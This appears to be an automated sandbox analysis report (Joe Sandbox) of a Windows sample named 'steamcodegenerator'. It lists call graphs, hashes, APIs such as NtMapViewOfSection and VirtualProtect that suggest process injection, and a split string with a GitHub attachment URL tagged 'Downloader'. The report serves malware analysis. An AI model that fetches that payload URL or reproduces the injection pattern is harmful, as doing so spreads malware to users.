19155->19156 19155->19158 19156->19151 19156->19158 19207 7ff71c070d60 19158->19207 19293 7ff71c062104 EnterCriticalSection 19159->19293 19176 7ff71c06488c 19175->19176 19182 7ff71c064887 19175->19182 19177 7ff71c06a298 _Getctype 47 API calls 19176->19177 19176->19182 19178 7ff71c0648a7 19177->19178 19183 7ff71c068b90 19178->19183 19182->19137 19182->19138 19184 7ff71c0648ca 19183->19184 19185 7ff71c068ba5 19183->19185 19187 7ff71c068bfc 19184->19187 19185->19184 19191 7ff71c073264 19185->19191 19188 7ff71c068c24 19187->19188 19189 7ff71c068c11 19187->19189 19188->19182 19189->19188 19204 
7ff71c0712d0 19189->19204 19192 7ff71c06a298 _Getctype 47 API calls 19191->19192 19193 7ff71c073273 19192->19193 19194 7ff71c0732be 19193->19194 19203 7ff71c062104 EnterCriticalSection 19193->19203 19194->19184 19205 7ff71c06a298 _Getctype 47 API calls 19204->19205 19206 7ff71c0712d9 19205->19206 19208 7ff71c070d9d GetCPInfo 19207->19208 19209 7ff71c070e93 19207->19209 19208->19209 19215 7ff71c070db0 19208->19215 19210 7ff71c058d90 _invalid_parameter_noinfo_noreturn 8 API calls 19209->19210 19212 7ff71c070f32 19210->19212 19212->19151 19218 7ff71c06f1d0 19215->19218 19219 7ff71c064868 TranslateName 47 API calls 19218->19219 19220 7ff71c06f212 19219->19220 19238 7ff71c06fba4 19220->19238 19240 7ff71c06fbad MultiByteToWideChar 19238->19240 19295 7ff71c061b0d 19294->19295 19296 7ff71c061b17 19294->19296 19295->19296 19301 7ff71c061b32 19295->19301 19297 7ff71c064848 memcpy_s 11 API calls 19296->19297 19298 7ff71c061b1e 19297->19298 19299 7ff71c062024 _invalid_parameter_noinfo 47 API calls 19298->19299 19300 7ff71c061b2a 19299->19300 19300->18868 19301->19300 19302 7ff71c064848 memcpy_s 11 API calls 19301->19302 19302->19298 19304 7ff71c065c55 19303->19304 19308 7ff71c065c0d 19303->19308 19305 7ff71c065c7e 19304->19305 19306 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19304->19306 19307 7ff71c068af4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19305->19307 19306->19304 19307->19308 19308->18869 19310 7ff71c054ba1 19309->19310 19313 7ff71c051350 19310->19313 19318 7ff71c056688 19313->19318 19323 7ff71c056518 19318->19323 19322 7ff71c0566aa 19331 7ff71c05a8d8 19323->19331 19325 7ff71c05654c 19326 7ff71c05ab1c 19325->19326 19327 7ff71c05ab3b 19326->19327 19328 7ff71c05ab64 RtlPcToFileHeader 19327->19328 19329 7ff71c05ab86 RaiseException 19327->19329 19330 7ff71c05ab7c 19328->19330 19329->19322 19330->19329 19332 7ff71c05a92e __vcrt_freefls 19331->19332 19333 7ff71c05a8f9 19331->19333 19332->19325 19333->19332 19334 
7ff71c061b00 __std_exception_copy 47 API calls 19333->19334 19334->19332 19336 7ff71c06a298 _Getctype 47 API calls 19335->19336 19337 7ff71c068151 19336->19337 19338 7ff71c064e4c BuildCatchObjectHelperInternal 47 API calls 19337->19338 19339 7ff71c068171 19338->19339 19340 7ff71c056130 19342 7ff71c056164 19340->19342 19353 7ff71c0562ac ISource _Yarn 19340->19353 19341 7ff71c05635e 19374 7ff71c056370 19341->19374 19342->19341 19345 7ff71c056207 19342->19345 19346 7ff71c0561bb 19342->19346 19342->19353 19350 7ff71c058db8 std::_Facet_Register 49 API calls 19345->19350 19352 7ff71c0561ca _Yarn 19345->19352 19348 7ff71c056358 19346->19348 19354 7ff71c058db8 19346->19354 19368 7ff71c0512b0 19348->19368 19350->19352 19352->19353 19363 7ff71c062044 19352->19363 19356 7ff71c058dc3 19354->19356 19355 7ff71c058ddc 19355->19352 19356->19355 19357 7ff71c065484 std::_Facet_Register 2 API calls 19356->19357 19358 7ff71c058de2 19356->19358 19357->19356 19359 7ff71c058ded 19358->19359 19377 7ff71c056668 19358->19377 19361 7ff71c0512b0 Concurrency::cancel_current_task 49 API calls 19359->19361 19362 7ff71c058df3 ISource 19361->19362 19362->19352 19364 7ff71c061ebc _invalid_parameter_noinfo_noreturn 47 API calls 19363->19364 19365 7ff71c06205d 19364->19365 19366 7ff71c062074 _invalid_parameter_noinfo_noreturn 17 API calls 19365->19366 19367 7ff71c062072 19366->19367 19369 7ff71c0512be Concurrency::cancel_current_task 19368->19369 19370 7ff71c05ab1c Concurrency::cancel_current_task 2 API calls 19369->19370 19371 7ff71c0512cf 19370->19371 19372 7ff71c05a8d8 __std_exception_copy 47 API calls 19371->19372 19373 7ff71c0512f9 19372->19373 19373->19341 19375 7ff71c056688 49 API calls 19374->19375 19376 7ff71c056380 19375->19376 19378 7ff71c056676 std::bad_alloc::bad_alloc 19377->19378 19379 7ff71c05ab1c Concurrency::cancel_current_task 2 API calls 19378->19379 19380 7ff71c056687 19379->19380 19381 7ff71c068b30 19382 7ff71c068b7b 19381->19382 19383 7ff71c068b3f memcpy_s 19381->19383 19385 
7ff71c064848 memcpy_s 11 API calls 19382->19385 19383->19382 19384 7ff71c068b62 HeapAlloc 19383->19384 19387 7ff71c065484 std::_Facet_Register 2 API calls 19383->19387 19384->19383 19386 7ff71c068b79 19384->19386 19385->19386 19387->19383 19388 20c747379f8 VirtualAlloc 19389 20c74737a10 19388->19389 19390 20c74737a3c 19388->19390 19390->19389 19402 20c7473943b 19390->19402 19392 20c74737ab0 19392->19389 19393 20c74737b07 19392->19393 19431 20c747391ab 19392->19431 19393->19389 19394 20c7473943b LoadLibraryA 19393->19394 19395 20c74737b47 19393->19395 19394->19393 19395->19389 19401 20c74737bbe 19395->19401 19435 20c747368fb 19395->19435 19398 20c74737ba5 19398->19389 19442 20c74736a27 19398->19442 19401->19389 19406 20c7473819f 19401->19406 19404 20c74739472 19402->19404 19403 20c74739497 19403->19392 19404->19403 19447 20c74736f47 19404->19447 19407 20c747381f3 19406->19407 19408 20c7473824b NtCreateSection 19407->19408 19410 20c7473827a 19407->19410 19430 20c74738a27 19407->19430 19408->19410 19408->19430 19409 20c74738320 NtMapViewOfSection 19416 20c74738374 19409->19416 19410->19409 19410->19430 19411 20c747386ef VirtualAlloc 19418 20c747387a6 19411->19418 19412 20c747391ab LoadLibraryA 19412->19416 19414 20c747391ab LoadLibraryA 19415 20c74738650 19414->19415 19415->19411 19415->19414 19424 20c74739293 LoadLibraryA 19415->19424 19416->19412 19416->19415 19421 20c74739293 LoadLibraryA 19416->19421 19416->19430 19417 20c747388a2 VirtualProtect 19419 20c747389b5 VirtualProtect 19417->19419 19420 20c747388ca 19417->19420 19418->19417 19422 20c7473881e NtUnmapViewOfSection 19418->19422 19427 20c747389f1 19419->19427 19425 20c747389a8 19420->19425 19429 20c7473897b VirtualProtect 19420->19429 19421->19416 19423 20c74738836 NtMapViewOfSection 19422->19423 19422->19430 19423->19417 19423->19430 19424->19415 19425->19419 19427->19430 19461 20c74738f4f 19427->19461 19429->19420 19430->19389 19433 20c747391c9 19431->19433 19432 20c74739274 LoadLibraryA 19434 20c7473927c 
19432->19434 19433->19432 19433->19434 19434->19392 19436 20c747391ab LoadLibraryA 19435->19436 19437 20c7473691a 19436->19437 19438 20c74739293 LoadLibraryA 19437->19438 19441 20c74736922 19437->19441 19439 20c74736941 19438->19439 19440 20c74739293 LoadLibraryA 19439->19440 19439->19441 19440->19441 19441->19398 19443 20c747391ab LoadLibraryA 19442->19443 19444 20c74736a45 19443->19444 19445 20c74739293 LoadLibraryA 19444->19445 19446 20c74736a5a 19445->19446 19446->19401 19448 20c74736f87 19447->19448 19450 20c7473701e 19447->19450 19448->19450 19451 20c747370ff 19448->19451 19450->19404 19452 20c74737142 19451->19452 19456 20c7473716b 19451->19456 19454 20c7473717b 19452->19454 19452->19456 19457 20c74739293 19452->19457 19453 20c747391ab LoadLibraryA 19453->19454 19454->19450 19456->19453 19456->19454 19458 20c74739403 19457->19458 19459 20c747392c9 19457->19459 19458->19452 19459->19458 19460 20c747370ff LoadLibraryA 19459->19460 19460->19458 19464 20c74738f8b 19461->19464 19462 20c74739187 19462->19430 19463 20c74739293 LoadLibraryA 19463->19464 19464->19462 19464->19463

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _invalid_parameter_noinfo_noreturn$Virtual$AllocFreeSleep
                                                                                                                          • String ID: Downloader$htt$nts/files/17267811/stm.txt$om/user-attachme$ps://gith$ub.c
                                                                                                                          • API String ID: 1298506739-3644530041
                                                                                                                          • Opcode ID: ea04dfb8b05b74b2b0620327f61315c56e469aa5f16ef72dec762d63fb4ec1f1
                                                                                                                          • Instruction ID: 2713d3e6af263ab54ab6fbba1ef888107c3dc5615fba8a67d6a89a728fb30c4e
                                                                                                                          • Opcode Fuzzy Hash: ea04dfb8b05b74b2b0620327f61315c56e469aa5f16ef72dec762d63fb4ec1f1
                                                                                                                          • Instruction Fuzzy Hash: 1DE1A462E14F8546EA00EBB4D8453EDA771EF957B4F609321EB5C12ADADF38E5C48310
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: SectionVirtual$ProtectView$AllocCreateUnmap
                                                                                                                          • String ID: @
                                                                                                                          • API String ID: 1653215272-2766056989
                                                                                                                          • Opcode ID: 2ed318d2ea2cf2278bd42e912a4e74bd6f32db374bd63d65325d2cd2078d0a12
                                                                                                                          • Instruction ID: bbb6aa073826f17d28d66a6f97528f1928a67cd9928eb00d969b4fdc6bc61509
                                                                                                                          • Opcode Fuzzy Hash: 2ed318d2ea2cf2278bd42e912a4e74bd6f32db374bd63d65325d2cd2078d0a12
                                                                                                                          • Instruction Fuzzy Hash: FD72BC70614B488FDB6DDF28C8897A9B3E6FB98314F25461DD84BC7252DB34E582CB41

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID: l
                                                                                                                          • API String ID: 1029625771-2517025534
                                                                                                                          • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                                                                          • Instruction ID: 7b6a69617352186cbd44f8e888bdbfcaae7df42528b7d1ed4aa7cabd9e599a30
                                                                                                                          • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                                                                          • Instruction Fuzzy Hash: 383164A0918BC58FE759DB288148B55FBDAFB9A308F3456ADC0DAC7163D734D846CB01

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 73155330-0
                                                                                                                          • Opcode ID: c35681c349dced017d86a5f3adb7903ad82b0333e43f206d0047bf9162d83481
                                                                                                                          • Instruction ID: 0c2d85cbb13b720bf6d760dd39e2ae1513b9466979c7218022cccb7426b57c59
                                                                                                                          • Opcode Fuzzy Hash: c35681c349dced017d86a5f3adb7903ad82b0333e43f206d0047bf9162d83481
                                                                                                                          • Instruction Fuzzy Hash: A3510362B19F9546E910AAA2AD082FDA360AF55FE0FE48231DF5D07B85DF3CE149C310

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 1236291503-0
• Opcode ID: d1d0374af1531000f124c1798acd8703a075724bd8eabcca79cb574d2685e6b7
• Instruction ID: 612ad1c1fb71183c3fb55467d973004fec87fa4827dc9e9a2fb0348af961a1ca
• Opcode Fuzzy Hash: d1d0374af1531000f124c1798acd8703a075724bd8eabcca79cb574d2685e6b7
• Instruction Fuzzy Hash: CF314D21A0CE9346FA14BBE49C113F9A361AF46764FE41534EB4D0B6D7DF2EA50D8231

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: 080277b50c5276ac360943eb1b1c156bec9c5cf942e338d9d9fe34af66a790ff
• Instruction ID: 310b1b53f369f1af6a040e164a6461a55b73642f6afb207ecdbeae2185a2d2d9
• Opcode Fuzzy Hash: 080277b50c5276ac360943eb1b1c156bec9c5cf942e338d9d9fe34af66a790ff
• Instruction Fuzzy Hash: C7319221B18F5551EB20AF558D851B8F660FB45BB0BB41729DB6E073E0CF38E595C310

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
• String ID:
• API String ID: 1173176844-0
• Opcode ID: 44696b21bd67145d8e0760ec95888dcbd043158a58de3966fd1fe4f79ebb6704
• Instruction ID: 4e01c01c536d481ace076417f270c733188cb44f43fbc949413292ced15f9a51
• Opcode Fuzzy Hash: 44696b21bd67145d8e0760ec95888dcbd043158a58de3966fd1fe4f79ebb6704
• Instruction Fuzzy Hash: 63F03010E59A0642FD5936E55C061F592A44F18770EB80730DF7C093C2EF1CA59D8230

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000000.00000002.3398854857.0000020C74771000.00000020.10000000.00040000.00000000.sdmp, Offset: 0000020C74771000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20c74771000_steamcodegenerator.jbxd
Similarity
• API ID: Exec
• String ID:
• API String ID: 459137531-0
• Opcode ID: 1ce1e83e12cea887f5631db8c3beb4c8b375af077da88e97cfda06e046574df1
• Instruction ID: be6b6a9f6706193e6807ece303a74b0646a1e8a135fd971295c7e98098274022
• Opcode Fuzzy Hash: 1ce1e83e12cea887f5631db8c3beb4c8b375af077da88e97cfda06e046574df1
• Instruction Fuzzy Hash: 3C316171644E084FEB48FF74DC5DAA977AAE798301F50853A940BC7272DA78CA05CB40

Control-flow Graph
APIs
Memory Dump Source
• Source File: 00000000.00000002.3398779479.0000020C74730000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000020C74730000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_20c74730000_steamcodegenerator.jbxd
Yara matches
Similarity
• API ID: AllocCreateSectionVirtual
• String ID:
• API String ID: 1590197315-0
• Opcode ID: eb4d697b95cde0fb80402334880357f1ef1fd47815b20976dc2f64c6329480eb
• Instruction ID: f8d98abc876ddba08bcd393e3928876d76473fb62192d3d2af2e349544d83e64
• Opcode Fuzzy Hash: eb4d697b95cde0fb80402334880357f1ef1fd47815b20976dc2f64c6329480eb
• Instruction Fuzzy Hash: ECB1E870B14B454BEB6DDB2884997A9F3DAFB85300F248369D44AC7197DB30E886CF81

Control-flow Graph

APIs
• __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF71C0590E4
  • Part of subcall function 00007FF71C05AE30: __vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00007FF71C05AE38
  • Part of subcall function 00007FF71C05AE30: __vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00007FF71C05AE3D
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: __scrt_dllmain_crt_thread_attach__vcrt_uninitialize_locks__vcrt_uninitialize_ptd
• String ID:
• API String ID: 1208906642-0
• Opcode ID: 474fc897f0be47f68d46e62fd6981f481194b323a22c8996711b27343b9b6b83
• Instruction ID: 21515bf6043fbfd70688bd66d30d56811b41bfff476d407699e7661b22d86950
• Opcode Fuzzy Hash: 474fc897f0be47f68d46e62fd6981f481194b323a22c8996711b27343b9b6b83
• Instruction Fuzzy Hash: 77E09220E1DA9386FEA436E11E0A2F996605F22364FF05978DA4D021839F0F658F5631

Control-flow Graph

APIs
• HeapAlloc.KERNEL32(?,?,?,00007FF71C06F7B1,?,?,00000000,00007FF71C074803,?,?,?,00007FF71C067CF3,?,?,?,00007FF71C067BE9), ref: 00007FF71C068B6E
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
• Opcode ID: bd55b1ea0fc155a6d1c409fefb9d932666b1c806ec432e723f80dda1b82eeeb6
• Instruction ID: d44f6b1f9f80975c5a39c6213d8512bb2d847c8501cf5d077afefe13397ee335
• Opcode Fuzzy Hash: bd55b1ea0fc155a6d1c409fefb9d932666b1c806ec432e723f80dda1b82eeeb6
• Instruction Fuzzy Hash: F9F03A84F09E1645FA547EF15C422F4B1844F847B0FE85730D92E862C2DF2CA5488B30
Strings
Memory Dump Source
• Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
• Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: s$s$,
• API String ID: 3215553584-728586918
• Opcode ID: 06cdfdd089d7f53002eee445f53705af94493326fe36f7a161390db78508ff4b
• Instruction ID: 46abc98327c525ef33b88d1fa6a75db0c280233d4e6630c0e3b85ade38c6da5f
• Opcode Fuzzy Hash: 06cdfdd089d7f53002eee445f53705af94493326fe36f7a161390db78508ff4b
• Instruction Fuzzy Hash: 70A22372F187C28BE7289FA4D8417FCB7A1FB44398FA05135DA4D57A84DB39A908CB50
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastNameTranslate$CodeInfoLocalePageValidValue
                                                                                                                          • String ID: utf8
                                                                                                                          • API String ID: 3069159798-905460609
                                                                                                                          • Opcode ID: d4b3ff6ab2fd706453dd6c794e4175711012dd38f10e3c9d27665adbabbc73f4
                                                                                                                          • Instruction ID: bbc79f1b838dee1b061e37e24fdee45bd084f1ed04ab90514805f0b64603aa9f
                                                                                                                          • Opcode Fuzzy Hash: d4b3ff6ab2fd706453dd6c794e4175711012dd38f10e3c9d27665adbabbc73f4
                                                                                                                          • Instruction Fuzzy Hash: 21917F36A08B4681FB28AFA199432F9A394EF44FA0FA44131DB8C47785DF3CE5598761
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2591520935-0
                                                                                                                          • Opcode ID: 9965b17ae3c4a17e3d0caa9ea39aea03ad22011a5320ec8fc02cfc6467b481ea
                                                                                                                          • Instruction ID: 0f1de3cda5b49d23e5af2653853ce601cb4e0db2b59d54a41e6b6ce4559bae17
                                                                                                                          • Opcode Fuzzy Hash: 9965b17ae3c4a17e3d0caa9ea39aea03ad22011a5320ec8fc02cfc6467b481ea
                                                                                                                          • Instruction Fuzzy Hash: 50718C22B04F0285FB18AFE0DC422F9A3A8AF44764FA54131CA8D13695EF3CA449CB60
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3140674995-0
                                                                                                                          • Opcode ID: 98028c3c7c245ce19bddfd2eddf14e9f2f0bacc6a8fa3fd2ff093612927a1805
                                                                                                                          • Instruction ID: defe5f08bde2d0f0728088e5be180fc8eafa7f523cbc0f52d2bd474dc7e2827c
                                                                                                                          • Opcode Fuzzy Hash: 98028c3c7c245ce19bddfd2eddf14e9f2f0bacc6a8fa3fd2ff093612927a1805
                                                                                                                          • Instruction Fuzzy Hash: 1E313B72608F8186EB64AFA0E8453F9B360FB85754F94443ADB8E47B94EF38D548C724
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.3398992673.00007FF71C050000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399053616.00007FF71C07B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399091958.00007FF71C08C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                          • Associated: 00000000.00000002.3399120497.00007FF71C08F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_7ff71c050000_steamcodegenerator.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1239891234-0
                                                                                                                          • Opcode ID: 8912553d44b3abefc55f9a8b3a26313e64a573415501656d81ef5f530cc03b7e
                                                                                                                          • Instruction ID: 88cf5564d008dba8d5d34bf0a0158319ff847d18a7e51947885580b5e9e207e2
                                                                                                                          • Opcode Fuzzy Hash: 8912553d44b3abefc55f9a8b3a26313e64a573415501656d81ef5f530cc03b7e
                                                                                                                          • Instruction Fuzzy Hash: 8D314C36608F8186DB649FA5EC452EAB3A4FB89768FA00135EB9D43B54DF38C549CB10
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.3399017355.00007FF71C051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF71C050000, based on PE: true
